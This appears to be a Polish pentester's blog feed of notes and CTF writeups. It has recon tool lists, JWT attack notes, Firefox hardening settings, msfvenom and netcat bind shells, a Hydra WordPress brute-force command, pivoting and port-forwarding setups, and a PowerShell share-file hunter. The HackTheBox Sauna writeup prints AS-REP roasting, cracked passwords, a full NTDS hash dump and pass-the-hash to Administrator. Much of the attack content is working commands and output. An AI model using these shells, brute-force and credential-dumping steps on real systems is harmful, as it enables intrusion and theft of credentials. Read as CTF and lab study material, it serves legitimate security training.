Rekonesans IT

October 18, 2018, 11:27 am

Notatki z SHP

gotcha.pw - wyciek hasel (pobranie bazy bez gwiazdek? Tak)

https://www.zoomeye.org/ /shodan : (zoomeye: +django +debug.) (W shodan has_screenshot:yes)

crt.sh - %domena.pl (szuka subdomen)

builtwith.com/ -pokazuje z jakich technologi zbudowana jest infra,
zakładka relationship profile pokazuje kody trackujace i pokazać inne site które z niego korzystają :)

hardenize.com - skaner bezpieczenstwa

android.fallible.co - szuka sekretnych danych w apce mobilnej

publicwww.com - wyszukiwarka kodow zrodlowych html,css,javascriptow - szukamy tutaj np. Malwarow itp, poszukac klucze api (wpisujac w wyszukiwarke apikey)

github.com/michenriksen/aquatone - szuka subdomen (szuka we wszystkim virustotal(trzeba dac api key, crt.sh webarchive, itp)

Virustotal.com - search: twitter.com (do szukania subdomen) / szukanie tez wirtualnych domen klikając na IP w wynikach wyszukiwania

archive.org - szukanie starych linków do aktualnych zasobow, jak juz jest nowa www a stary zasob moze zostal, szukanie tez podd omen

↧

JWT - JSON Web Tokens

October 18, 2018, 11:29 am

≫ Next: Android - analiza dynamiczna aplikacji

≪ Previous: Rekonesans IT

Notatki z SHP

JTW - bezpieczna wymiana informacji wykorzystująca json pomiędzy dwoma apkami

Rozkowanie base64 (wiec nie zapewnia poufności)

Httparchive

GoogleBigquery i wyszukiwanie danych z httparchive (np. Tokenow jwt, authorization basic itp)

Bruteforce hasla do JWT (np. Hashcatem)
Zmiana algorytmu szyfrującego (np. Z HS256) JWT na none

Uwaga na JWT.io jak wpiszemy alg none to nie pokaże wyników (trzeba samemu base64 codowac

3. Resign-vuln - szyfruje kluczem prywatnym RSA mój token, a publiczny klucz RSA wrzucam w headerze

JWT WYGLADA TAK: NAGLOWEK.DANE.PODPIS

sekurak.pl/jwt-ebook.pdf < opis JWT wraz z checlista ]

↧

Android - analiza dynamiczna aplikacji

October 19, 2018, 2:27 am

≫ Next: Hardening firefox

≪ Previous: JWT - JSON Web Tokens

https://github.com/ac-pm/Inspeckage
https://vimeo.com/156745941

↧

Hardening firefox

November 7, 2018, 11:55 am

≫ Next: bind shell

≪ Previous: Android - analiza dynamiczna aplikacji

[about:config]
privacy.firstparty.isolate = true
privacy.resistFingerprint = true
privacy.trackingprotection.enabled = true
privacy.donottrackheader.enabled = true
privacy.donottrackheader.value = 1
browser.cache.disk.enable = false
browser.cache.disk.filesystem_reported = 1
browser.cache.disk.smart_size.first_run = false
browser.cache.disk.cache_ssl = false
browser.cache.disk.frecency_experiment = 2
browser.cache.offline.enable = false
browser.safebrowsing.malware.enabled = false
browser.safebrowsing.phishing.enabled = false
browser.send_pings = false
browser.sessionstore.max_tabs_undo = 0
browser.urlbar.speculativeConnect.enabled = false
browser.sessionstore.privacy_level = 2
browser.privatebrowsing.autostart = true
browser.safebrowsing.appRepURL = (empty)
dom.battery.enabled = false
dom.event.clipboardevents.enabled = true
dom.indexedDB.enabled = false
dom.storage.enabled = false
geo.enabled = false
geo.wifi.uri = (empty)
media.navigator.enabled = false
network.cookie.cookieBehavior = 1
network.cookie.lifetimePolicy = 2
network.http.referer.trimmingPolicy = 2
network.http.referer.XOriginPolicy = 2
network.http.referer.XOriginTrimmingPolicy = 2
network.prefetch-next = false
network.http.referer.spoofSource = true
network.dns.disablePrefetch = true
network.IDN_show_punycode = true
webgl.disabled = true
beacon.enabled = false
media.video_stats.enabled = false
media.peerconnection.enabled = false
media.peerconnection.dtmf.enabled = false
media.peerconnection.ice.default_address_only = true
media.peerconnection.ice.no_host = true
media.peerconnection.identity.enabled = false
media.peerconnection.simulcast = false
media.peerconnection.turn.disable = true
media.peerconnection.use_document_iceservers = false
media.peerconnection.video.enabled = false
media.peerconnection.video.vp9_enabled = false
security.ssl3.rsa_aes_128_sha = false
security.ssl3.rsa_aes_256_sha = false
security.ssl3.rsa_des_ede3_sha = false
general.useragent.site_specific_overrides = true

Plugins:

https://addons.mozilla.org/en-US/firefox/addon/https-everywhere/
https://addons.mozilla.org/en-US/firefox/addon/canvasblocker/
https://addons.mozilla.org/en-US/firefox/addon/noscript/
https://addons.mozilla.org/en-US/firefox/addon/privacy-badger17/

Check your browser's properties with:

https://check.torproject.org/
https://ip-check.info/?lang=en
https://ipleak.net/

↧

bind shell

December 12, 2018, 12:48 am

≫ Next: Hydra cheat sheet

≪ Previous: Hardening firefox

msvenom bind shell:

vitim:
msfvenom -p linux/x64/shell_bind_tcp LPORT=2222 -f elf > shell.elf
./shell.elf

attacker:
nc IP_VICTIM 2222
python -c 'import pty;pty.spawn("/bin/bash")'

OR

msf exploit(multi/handler) > use multi/handler
msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------

Payload options (linux/x86/shell_bind_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 2222 yes The listen port
RHOST 172.21.65.139 no The target address

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2222
[*] Command shell session 3 opened (10.0.3.15:46445 -> 172.21.65.139:2222) at 2018-12-12 11:54:51 +0100

ls
dirtyc0w

netcat:
nc -lvp 8080 -e /bin/bash <- victim
nc IP_VICTIM 8080<-- attacker

Bind shell meterpreter

victim:
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=2223 -f elf > shell_meterpreter_bind_2223.elf

chmod +x shell_meterpreter_bind_2223.elf

./shell_meterpreter_bind_2223.elf

attacker:

msf exploit(multi/handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description

---- --------------- -------- -----------

Payload options (linux/x86/meterpreter/bind_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

LPORT 2223 yes The listen port

RHOST 172.21.65.139 no The target address

Exploit target:

Id Name

-- ----

0 Wildcard Target

msf exploit(multi/handler) > exploit

[*] Started bind TCP handler against 172.21.65.139:2223

[*] Sending stage (861480 bytes) to 172.21.65.139

[*] Meterpreter session 6 opened (10.0.3.15:41461 -> 172.21.65.139:2223) at 2018-12-12 12:04:01 +0100

meterpreter >

↧

Hydra cheat sheet

January 10, 2019, 5:07 am

≫ Next: Pivoting

≪ Previous: bind shell

Wordpress:

hydra -l LOGIN -P /usr/share/wordlists/rockyou.txt www.website.com -S -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&redirect_to=https%3A%2F%2Fwww.website.com%2Fwp-admin%2F&wp-submit=Log In&testcookie=1:S=Location'

↧

Pivoting

January 23, 2019, 1:19 am

≫ Next: Przekazywanie portu w Linux np. dla Metasploit

≪ Previous: Hydra cheat sheet

Jeśli potrzebujesz z serwera, na którym zdobyłeś powłokę dostać się do zasobów sieci lokalne to użyj 3proxy

Serwer na którym zdobyłeś powłokę:

wget https://github.com/z3APA3A/3proxy/archive/0.8.12.tar.gz
tar zxvf 0.8.12.tar.gz
cd 3proxy
make -f Makefile.Linux
cp src/3proxy .
printf "auth none\nsocks -p31337\n"> 3conf
./3proxy 3conf &

Teraz masz socks proxy nasłuchujące na porcie 31337 i możesz użyć np proxychains

BONUS:
https://github.com/klsecservices/rpivot <- reverse proxy

↧

Przekazywanie portu w Linux np. dla Metasploit

January 29, 2019, 12:18 pm

≫ Next: Problem with Metasploit using an SSL Certificate (HandlerSSLCert)

≪ Previous: Pivoting

Podczas atakowania zewnętrznego celu często można spotkać następującą infrastrukturę:
- Komputer A - ofiara
- Komputer B - serwer pośredniczący
- Komputer C - atakujący

W celu przekazania połączenia z A do C należy zastosować przekierowanie portów za pomocą SSH

W tym celu na komputerze B dodać:

do /etc/ssh/sshd_config dodać GatewayPorts yes
i restart sshd

Na komputerze C wykonać polecenie:

ssh -R 8888:localhost:4444 michal@komputer_b -p port_ssh_komputera_b

Na komputerze C uruchomić np multi/handler z
LHOST -> ip_komputera_C
LHOST -> port 4444

Na komputerze B uruchomic ladunek z opcjami:
LHOST -> ip_komputera_B
LHOST -> port 8888

↧

Problem with Metasploit using an SSL Certificate (HandlerSSLCert)

January 30, 2019, 10:07 am

≫ Next: Merge DLL files into EXE

≪ Previous: Przekazywanie portu w Linux np. dla Metasploit

If you want to use your own certificate for metasploit, for example in case windows/meterpreter/reverse_https we should use auxiliary/gather/impersonate_sslbut but earlier change setting openssl in your OS.

in /etc/ssl/openssl.cnf

from
CipherString=DEFAULT@SECLEVEL=2
to
CipherString=DEFAULT

↧

Merge DLL files into EXE

February 28, 2019, 3:13 am

≫ Next: European Cyber Security Challenge 2019 Safe Ninja - writeup

≪ Previous: Problem with Metasploit using an SSL Certificate (HandlerSSLCert)

https://www.youtube.com/watch?v=a_r3tQ06xpE

C:\Program Files (x86)\Microsoft\ILMerge>ILMerge.exe C:\Users\w4cky\source\repos\SSHapp\SSHapp\bin\Debug\SSHapp.exe C:\Users\w4cky\source\repos\SSHapp\SSHapp\bin\Debug\Renci.SshNet.dll /out:C:\Users\w4cky\source\repos\SSHapp\SSHapp\bin\Debug\zobaczSam.exe /target:exe /targetplatform:"v4,C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\.NETFramework\v4.0"

Download ILMerge: https://www.microsoft.com/en-us/download/confirmation.aspx?id=17630

↧

European Cyber Security Challenge 2019 Safe Ninja - writeup

June 28, 2019, 4:00 am

≫ Next: OSINT links

≪ Previous: Merge DLL files into EXE

Co roku pod przewodnictwem Europejskiej Agencji ds. Bezpieczeństwa Sieci i Informacji organizowane są europejskie ćwiczenia bezpieczeństwa IT: European Cyber Security Challenge. W 2019 roku udział wezmą reprezentacje narodowe 19 krajów UE oraz EFTA. Finały odbędą się w Bukareszcie, a za przeprowadzenie krajowych kwalifikacji odpowiada CERT Polska, część Naukowej i Akademickiej Sieci Komputerowej.

Poniżej prezentuje jak rozwiązać jedno z zadań - Safe Ninja

W tym zadaniu występuje klasyczna podatność SSTI. Możemy ją dość szybko wskazać przez np. przesłanie zmiennej {{1+334}} która zwróci nam wynik 335. Później należy sprawdzić, który z systemu szablonów jest używany. Akurat pracowałem w tym czasie nad inną podatnością SSTI dlatego od razu sprawdziłem {{config}} który wskazał mi system szablonów Jinja2.

Później już z górki i wyniki prezentuje poniżej. Co prawda dość długo zeszło mi na znalezieniu flagi. Na początku nie zauważyłem kolejnego z adresów url_map i próbowałem innych sztuczek z SSTI jak np. czytanie plików czy połączenie z powłoką ale nie tedy droga. Sama flaga została ukryta w cookies.


POST / HTTP/1.1
Host: safeninja.ecsc19.hack.cert.pl
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://safeninja.ecsc19.hack.cert.pl/
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------31681657624019
Content-Length: 337

-----------------------------31681657624019
Content-Disposition: form-data; name="title"

121
-----------------------------31681657624019
Content-Disposition: form-data; name="content"; filename="systemy.html"
Content-Type: text/plain

{{url_for.__globals__.current_app.__dict__}}
-----------------------------31681657624019--

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jun 2019 06:58:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Content-Length: 1017

<html>
<head>
<link crossorigin="anonymous" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" rel="stylesheet"></link>
<title>Create new web page</title>
</head>
<body>
<div class="container">
<h1>
Create new web page</h1>

<div>
<a href="https://www.blogger.com/page/feac7744bd048510f979b1475c53c079661ef0153f7c91b80a43a8f66d63e9e8">/page/feac7744bd048510f979b1475c53c079661ef0153f7c91b80a43a8f66d63e9e8</a>
</div>

<form enctype="multipart/form-data" method="POST">
<div class="form-group">
<label for="title">Title</label>
<input class="form-control" id="title" name="title" placeholder="Title" type="text" />
</div>
<div class="form-group">
<label for="content">Content (only valid HTML files, no malware allowed)</label>
<input class="form-control-file" id="content" name="content" type="file" />
</div>
<button class="btn btn-primary" type="submit">Submit</button>
</form>
</div>
</body>
</html>


root@kali:~# curl https://safeninja.ecsc19.hack.cert.pl/giiXXXXXXXXXXXXXXXX -I
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 25 Jun 2019 07:10:16 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
Set-Cookie: flag="ecsc19{it's_not_safeXXXXXXXXXXXXXXXX}"; Path=/

↧

OSINT links

September 5, 2019, 4:16 am

≫ Next: HackTheBox - Emdee five for life - WriteUp

≪ Previous: European Cyber Security Challenge 2019 Safe Ninja - writeup

https://github.com/jivoi/awesome-osint
https://start.me/p/rxRbpo/ti
https://www.osintdfir.com
https://www.faxvin.com/license-plate-lookup
https://knowem.com/
https://checkusernames.com/
https://stalkscan.com/
https://tineye.com/
https://www.genymotion.com/
Instagram search tool .. https://web.stagram.com/
http://onstrat.com/osint/
https://code.google.com/archive/p/theharvester/
https://docs.google.com/document/d/1BfLPJpRtyq4RFtHJoNpvWQjmGnyVkfE2HYoICKOGguA/edit#heading=h.kmtmtyoi48ch
https://github.com/Ph055a/awesome_osint
https://osintframework.com/

↧

HackTheBox - Emdee five for life - WriteUp

September 12, 2019, 1:56 am

≫ Next: Obtaining an IPv6 address from FTP ipv4 using FXP (rfc2428)

≪ Previous: OSINT links


import requests
import hashlib


s = requests.Session()
r = s.get("http://docker.hackthebox.eu:37358")
print(r.status_code)
print(r.text)
print('eeeeeeeeeeeeeee')


postString0 = r.text.split("\n",5)[5]
postString1 = postString0.split("<h1 align='center'>MD5 encrypt this string</h1><h3 align='center'>",1)[1]
kodzik = postString1.split("</h3>",1)[0]


print("kodzik from website:")
print(kodzik)


kodzikMd5 = hashlib.md5(kodzik.encode('utf-8')).hexdigest()

print("kodzik md5:")
print(kodzikMd5)


#p5={'hash': kodzikMd5}
p5='hash=kodzikMd5'

r5 = s.post("http://docker.hackthebox.eu:37358", p5)
print(r5.text)

↧

Obtaining an IPv6 address from FTP ipv4 using FXP (rfc2428)

October 16, 2019, 1:24 am

≫ Next: How to upgrade LND - Lighnting Network [Linux]

≪ Previous: HackTheBox - Emdee five for life - WriteUp

One of the tasks from HackTheBox gave me such a puzzle to solve. It is possible. I
spent some time on this because I didn't issue the LIST command. See how it is done correctly :)

220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 500 allowed.
220-Local time is now 03:50. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
Name (10.10.10.156:root): z3G3sJaXD4ktiQgLnXgdVWUUyiuOQpsH
331 User z3G3sJaXD4ktiQgLnXgdVWUUyiuOQpsH OK. Password required
Password:
230-This server supports FXP transfers
230-OK. Current restricted directory is /
230-0 files used (0%) - authorized: 10 files
230 0 Kbytes used (0%) - authorized: 1024 Kb
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote EPRT |1|10.10.10.156|2222|
200-FXP transfer: from 10.10.16.25 to 10.10.10.156
200 PORT command successful
ftp> quote EPRT |2|2001:41d0:52:a00::e66|2222|
200-FXP transfer: from 10.10.10.156 to 2001:41d0:52:a00::e66%176
200 PORT command successful
ftp> quote EPRT |1|10.10.10.156|2222|
200-FXP transfer: from 2001:41d0:52:a00::e66%176 to 10.10.10.156
200 PORT command successful
ftp> quote EPRT |2|dead:beef:4::1017|2222
200-FXP transfer: from 10.10.10.156 to dead:beef:4::1017%144
200 PORT command successful
ftp> LIST
?Invalid command
ftp> quote LIST
425 Could not open data connection to port 2222: Connection refused
ftp>

tcpdump -lni tun0 -vvvvvvv ip6

tcpdump: listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes

09:55:07.164353 IP6 (flowlabel 0xcf7d1, hlim 63, next-header TCP (6) payload length: 40) dead:beef::250:56ff:feb9:ec5b.34992> dead:beef:4::1017.2222: Flags [S], cksum 0x3463 (correct), seq 3989541210, win 28800, options [mss 1335,sackOK,TS val 1241233758 ecr 0,nop,wscale 7], length 0

09:55:07.164413 IP6 (flowlabel 0x8ed8b, hlim 64, next-header TCP (6) payload length: 20) dead:beef:4::1017.2222 > dead:beef::250:56ff:feb9:ec5b.34992: Flags [R.], cksum 0x0f90 (correct), seq 0, ack 3989541211, win 0, length 0

09:55:07.164503 IP6 (hlim 255, next-header ICMPv6 (58) payload length: 24) fe80::7335:993e:8d3e:de92 > ff02::1:ff00:0: [icmp6 sum ok] ICMP6, neighbor solicitation, length 24, who has ::

09:55:07.164508 IP6 (hlim 255, next-header ICMPv6 (58) payload length: 24) fe80::7335:993e:8d3e:de92 > ff02::1:ff00:0: [icmp6 sum ok] ICMP6, neighbor solicitation, length 24, who has ::

↧

How to upgrade LND - Lighnting Network [Linux]

October 27, 2019, 4:59 am

≫ Next: XSS w praktyce - deanomizacja

≪ Previous: Obtaining an IPv6 address from FTP ipv4 using FXP (rfc2428)

Recently I asked how to update LND to the latest version. He gave me the answer. And I made a small blog post for others. This post is for people who build their LND from sources.

0. upgrade GO

$ sudo rm -rf /usr/local/go

$ sudo tar -C /usr/local -xzf /home/nikhita/Downloads/go1.8.1.linux-amd64.tar.gz

$ echo $PATH | grep "/usr/local/go/bin"

1. stop LND from running

$ lncli stop

2. cd $GOPATH/src/github.com/lightningnetwork/lnd

$ cd $GOPATH/src/github.com/lightningnetwork/lnd
$ git fetch
$ git checkout v0.8.0-beta
$ make && make install

3. run LND

$ lnd --configfile=/home/w4cky/.lnd/lnd.conf

↧

XSS w praktyce - deanomizacja

November 25, 2019, 12:10 am

≫ Next: Przeszukiwanie plików z dostępem do odczytu na zasobach - powershell

≪ Previous: How to upgrade LND - Lighnting Network [Linux]

Natrafiłem na ciekawy artykuł pokazujący w praktyce jak przebiega skuteczny atak XSS. Artykuł pozakazuje kilka ciekawych technik (jak np wykradanie danych z auto uzupełnionych formularzy). Całość pokazuje w jaki sposób zwykły XSS zdeanonimizował administratora pewnej strony internetowej.

LINK: https://m417z.com/The-De-anonymization-of-the-Technion-Confessions-Admin/

↧

Przeszukiwanie plików z dostępem do odczytu na zasobach - powershell

January 21, 2020, 4:48 am

≫ Next: Turbo intruder sample code

≪ Previous: XSS w praktyce - deanomizacja

$REMOTE_HOST = "172.21.56.235"

$FILE_TYPES = "*.pst, *.conf"

net view \\$REMOTE_HOST\ |
ForEach-Object {
$path = [regex]::match($_, '(.*) Dysk').Groups[1].Value.Trim()

if ($path -ne "") {
Write-Host ("### PATH: " + $path)
Get-ChildItem -Path \\$REMOTE_HOST\$path -Include $FILE_TYPES -Recurse -ErrorAction Ignore |
ForEach-Object {
Try {
[System.IO.File]::OpenRead($_.FullName).Close()
Write-Host $_.FullName
}
Catch {
#Write-Host ("Niet: " + $_.FullName)
}
}
}
}

//Autor: hagier

↧

Turbo intruder sample code

January 27, 2020, 1:08 am

≫ Next: HackTheBox - Sauna - WriteUP

≪ Previous: Przeszukiwanie plików z dostępem do odczytu na zasobach - powershell

def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=100,
pipeline=False
)

for i in range(1000):
engine.queue(target.req)

engine.start()

def handleResponse(req, interesting):
if "cos" in req.response:
table.add(req)

↧

HackTheBox - Sauna - WriteUP

March 22, 2020, 4:06 am

≫ Next: Lab Pentestit 14 - writeup

≪ Previous: Turbo intruder sample code

My log from the attack on the Sauna machine on HackTheBox.
The beginning was long. All fun is enumeration. Start by enumerating employee accounts. The website turns out to be useful.

root@kali  /opt/kerbrute/dist   master v1.0.3  ./kerbrute_linux_amd64 userenum --dc 10.10.10.175 --domain EGOTISTICAL-BANK.local --delay 80 --safe -v -t 148 /tmp/logins

2020/03/19 20:27:25 > [!] steven.kerb@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 > [!] scoins@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 > [+] VALID USERNAME: fsmith@EGOTISTICAL-BANK.LOCAL
2020/03/19 20:27:26 > [!] sdriver@EGOTISTICAL-BANK.LOCAL - User does not exist
2020/03/19 20:27:26 > [!] btaylor@EGOTISTICAL-BANK.LOCAL - User does not exist

root@kali  /opt/dirsearch   master ?  smbclient -L 10.10.10.175 -U 'egotistical-bank.local\fsmith'
Enter EGOTISTICAL-BANK.LOCAL\fsmith's password:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
RICOH Aficio SP 8300DN PCL 6 Printer We cant print money
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available

Thestrokes23 ($krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL)

python3 GetNPUsers.py -dc-ip 10.10.10.175 egotistical-bank.local/ -usersfile /tmp/logins2 -format john -outputfile /tmp/responses.txt
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
root@kali  /opt/impacket/examples   master  cat /tmp/responses.txt  ✔  ⚡  4388  10:43:31
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:3dd2da95be95ab8337aca2d69e61c55c$39389c5553c64b749830594bb8b97709a7ec18ebbb53a522468167ac4919c07d9f8c64a18bee6fe5c50af7e8b9a79747c6c3aff7b897cc3466fa3d5a3a551b00ded67e01f42a7a68dc1883ac1b2e7b1289877e65c7d5642fb62a664c604e806a7969ccba7deb0228487b0c4a1e84f431174024ca98f35a39b99be5fea58ea5b23f75471deeb00f71253db6b025199c88dd1d4279aa8c7182e60ca3fa55f59645dd316ec94d49bc89fa77dc12c4cd3c8485e00bb0ef2abc60e5eacef7d31eba41a511f9cf1a94c9d67e9e1c5eb4db366258199cc2dc47f661c008e5bf58d0a5f856ce0836ea8a2eb50fb9d6781ad293714e7a91ea60805073eb6c617745b86aa9
root@kali  /opt/impacket/examples   master 

root@kali  /opt/impacket/examples   master  python3 lookupsid.py -target-ip 10.10.10.175 fsmith:Thestrokes23@egotistical-bank  ✔  ⚡  4382  10:41:10
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at egotistical-bank
[*] StringBinding ncacn_np:egotistical-bank[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2966785786-3096785034-1186376766
498: EGOTISTICALBANK\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: EGOTISTICALBANK\Administrator (SidTypeUser)
501: EGOTISTICALBANK\Guest (SidTypeUser)
502: EGOTISTICALBANK\krbtgt (SidTypeUser)
512: EGOTISTICALBANK\Domain Admins (SidTypeGroup)
513: EGOTISTICALBANK\Domain Users (SidTypeGroup)
514: EGOTISTICALBANK\Domain Guests (SidTypeGroup)
515: EGOTISTICALBANK\Domain Computers (SidTypeGroup)
516: EGOTISTICALBANK\Domain Controllers (SidTypeGroup)
517: EGOTISTICALBANK\Cert Publishers (SidTypeAlias)
518: EGOTISTICALBANK\Schema Admins (SidTypeGroup)
519: EGOTISTICALBANK\Enterprise Admins (SidTypeGroup)
520: EGOTISTICALBANK\Group Policy Creator Owners (SidTypeGroup)
521: EGOTISTICALBANK\Read-only Domain Controllers (SidTypeGroup)
522: EGOTISTICALBANK\Cloneable Domain Controllers (SidTypeGroup)
525: EGOTISTICALBANK\Protected Users (SidTypeGroup)
526: EGOTISTICALBANK\Key Admins (SidTypeGroup)
527: EGOTISTICALBANK\Enterprise Key Admins (SidTypeGroup)
553: EGOTISTICALBANK\RAS and IAS Servers (SidTypeAlias)
571: EGOTISTICALBANK\Allowed RODC Password Replication Group (SidTypeAlias)
572: EGOTISTICALBANK\Denied RODC Password Replication Group (SidTypeAlias)
1000: EGOTISTICALBANK\SAUNA$ (SidTypeUser)
1101: EGOTISTICALBANK\DnsAdmins (SidTypeAlias)
1102: EGOTISTICALBANK\DnsUpdateProxy (SidTypeGroup)
1103: EGOTISTICALBANK\HSmith (SidTypeUser)
1105: EGOTISTICALBANK\FSmith (SidTypeUser)
1108: EGOTISTICALBANK\svc_loanmgr (SidTypeUser)
root@kali  /opt/impacket/examples   master 

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 10.10.10.175 --user fsmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> dir

Directory: C:\Users\FSmith\Documents

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/20/2020 1:07 PM PowerSploit-master
-a---- 3/20/2020 1:18 PM 53760 SauronEye.exe
-a---- 3/20/2020 12:58 PM 7120 WindowsEnum.ps1

Windows Enumeration Script v 0.1
by absolomb
www.sploitspren.com
------------------------------------------

*Evil-WinRM* PS C:\Users\FSmith\Documents>

User Directories
------------------------------------------

Name
----
Administrator
FSmith
Public
svc_loanmgr
User Autologon Registry Items
------------------------------------------

DefaultDomainName DefaultUserName DefaultPassword
----------------- --------------- ---------------
EGOTISTICALBANK EGOTISTICALBANK\svc_loanmanager Moneymakestheworldgoround!

root@kali  /opt/evil-winrm   master v2.3  evil-winrm -i 10.10.10.175 --user svc_loanmgr -p Moneymakestheworldgoround!  1 ↵  ⚡  4545  13:32:41

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>

*Evil-WinRM* PS C:\Users\FSmith> gci -Recurse -Filter "user.txt" -File -ErrorAction SilentlyContinue -Path "C:\"

Directory: C:\Users\FSmith\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/23/2020 10:03 AM 34 user.txt

*Evil-WinRM* PS C:\Users\svc_loanmgr\DOcuments> ./winPEAS.exe

root@kali:/opt/SharpSploit/SharpSploit# secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.9.21.dev1+20200313.160519.0056b61c - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:f0b39206c3b064d1adc35f95e8a6e70c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:2e81c7eb6af46746f2765883f2c49879aa91a107170cf2a6e0abe4f5f593c607
SAUNA$:aes128-cts-hmac-sha1-96:63f3b1af0cadca84269ec7d2ad11bfe3
SAUNA$:des-cbc-md5:104c515b86739e08

root@kali  /opt/evil-winrm   master v2.3  evil-winrm -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff  1 ↵  ⚡  4569  12:02:57

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents>

↧

Lab Pentestit 14 - writeup

March 22, 2020, 4:07 am

